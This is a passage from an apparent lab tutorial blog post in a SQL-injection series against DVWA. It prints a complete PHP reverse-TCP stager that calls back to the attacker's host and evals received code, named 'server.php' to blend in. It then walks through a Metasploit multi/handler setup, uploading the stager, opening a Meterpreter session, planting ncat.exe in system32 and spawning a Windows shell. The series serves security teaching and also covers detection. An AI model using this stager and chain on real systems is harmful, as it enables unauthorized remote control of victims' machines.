We now have to remove the "/*" from the beginning of the file. You can simply open the file in your favourite editor to remove those two characters. For me I will use the "cut --characters" to cut out the first 2 characters and keep everything else. I then redirect that output to a file named "server.php". With that name I hope to blend in.

kali@securtynik:~$ cat tmp.php | cut --characters 3- > server.php
kali@securtynik:~$ cat server.php 
<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Next we load up "msfconsole" and configure the "multi/handler"

msf5 > use multi/handler

msf5 exploit(multi/handler) > set LHOST 10.0.0.107
LHOST => 10.0.0.107
msf5 exploit(multi/handler) > set LPORT 4443
LPORT => 443
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp

Verify all is good to go.

msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.107       yes       The listen address (an interface may be specified)
   LPORT  4443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Start the listening process by executing "exploit"

msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.107:4443 

Verify the port is listening on our local system.

kali@securtynik:~$ sudo ss --numeric --listening --tcp --process
sudo: unable to resolve host securtynik: Temporary failure in name resolution
State         Recv-Q        Send-Q               Local Address:Port                 Peer Address:Port        Process        
LISTEN        0             256                     10.0.0.107:4443                      0.0.0.0:*            users:(("ruby",pid=3354,fd=9))

Looks like we are good to go.

Now that it seems we have our attacking environment setup, let's now revisit our stager which was uploaded earlier when we got the "os-shell". The stager is hosted at "http://10.0.0.108:80/tmpuevkq.php" as we see earlier.

If we now open our browser and paste that URL, we see:

I then clicked browse and selected my "server.php" script.

Then uploaded the script

Now let's execute our script.

At this point, if we now transition to our "msfconsole", we see 

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.107:4443 
[*] Sending stage (38288 bytes) to 10.0.0.108
[*] Meterpreter session 1 opened (10.0.0.107:4443 -> 10.0.0.108:6375) at 2020-06-24 17:03:23 -0400

meterpreter > 

Looks like we successfully got the session. Execute "sysinfo"

meterpreter > sysinfo 
Computer    : SECURITYNIK-WIN
OS          : Windows NT SECURITYNIK-WIN 10.0 build 16299 (Windows 10) i586
Meterpreter : php/windows

At this point, we can now upload additional tools. Here I upload ncat.exe 

meterpreter > upload ncat.exe c:\\windows\\system32\\
[*] uploading  : ncat.exe -> c:\windows\system32\
[*] uploaded   : ncat.exe -> c:\windows\system32\\ncat.exe

Before we go, let's grab a shell.

meterpreter > shell
Process 3864 created.
Channel 6 created.
Microsoft Windows [Version 10.0.16299.125]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\System32>

I leave it to your imagination, what you do from here on. I will close off this post and see you in the log analysis post.

Posts in this series:

Continuing SQL Injection with SQLMap -Exploitation

Continuing SQL Injection with SQLMap - Detection via Log analysis

Continuing SQL Injection with SQLMap - Detection via Packet Analysis

References:

http://www.dvwa.co.uk/

http://sqlmap.org/

https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/

http://www.it-docs.net/ddata/4956.pdf

https://www.binarytides.com/sqlmap-hacking-tutorial/

https://www.willhackforsushi.com/?p=581

https://github.com/sqlmapproject/sqlmap

https://developers.whatismybrowser.com/useragents/explore/

https://crackstation.net/

https://www.offensive-security.com/metasploit-unleashed/Msfvenom/